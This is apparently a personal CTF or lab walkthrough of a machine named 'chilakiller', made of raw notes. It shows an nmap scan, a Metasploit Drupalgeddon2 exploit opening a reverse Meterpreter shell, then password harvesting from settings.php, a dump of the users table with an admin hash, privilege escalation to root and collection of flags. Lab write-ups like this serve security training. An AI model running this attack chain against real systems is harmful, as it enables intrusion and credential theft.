Category: Uncategorized
Protected: htb-monitorstwo-private
Protected: htb-onlyforyou-private
Protected: HTB-Flight-private
Protected: htb-shoppy-private
Protected: htb-object-private
ptd-chilakiller
.
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
\x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!– FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 –>
</body>
</html>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
MariaDB [(none)]>
MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
2 rows in set (0.00 sec)
MariaDB [drupaldb]>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$
su root
pw = ChilaKill3s_Tru3_L0v3R
root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762
root@chilakiller:/var/www/html/restaurante# find / -name “FLAG1.txt”
find / -name “FLAG1.txt”
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#
root@chilakiller:/var/www/html/restaurante# hostnamectl hostnamectl Static hostname: chilakiller Icon name: computer-vm Chassis: vm Machine ID: c8677bebac964d43bed5ebe1af1caaa6 Boot ID: 907f69a447f04a8782bde75417cec04a Virtualization: vmware Operating System: Debian GNU/Linux 9 (stretch) Kernel: Linux 4.9.0-13-amd64 Architecture: x86-64 root@chilakiller:/var/www/html/restaurante#
Author : Puckiestyle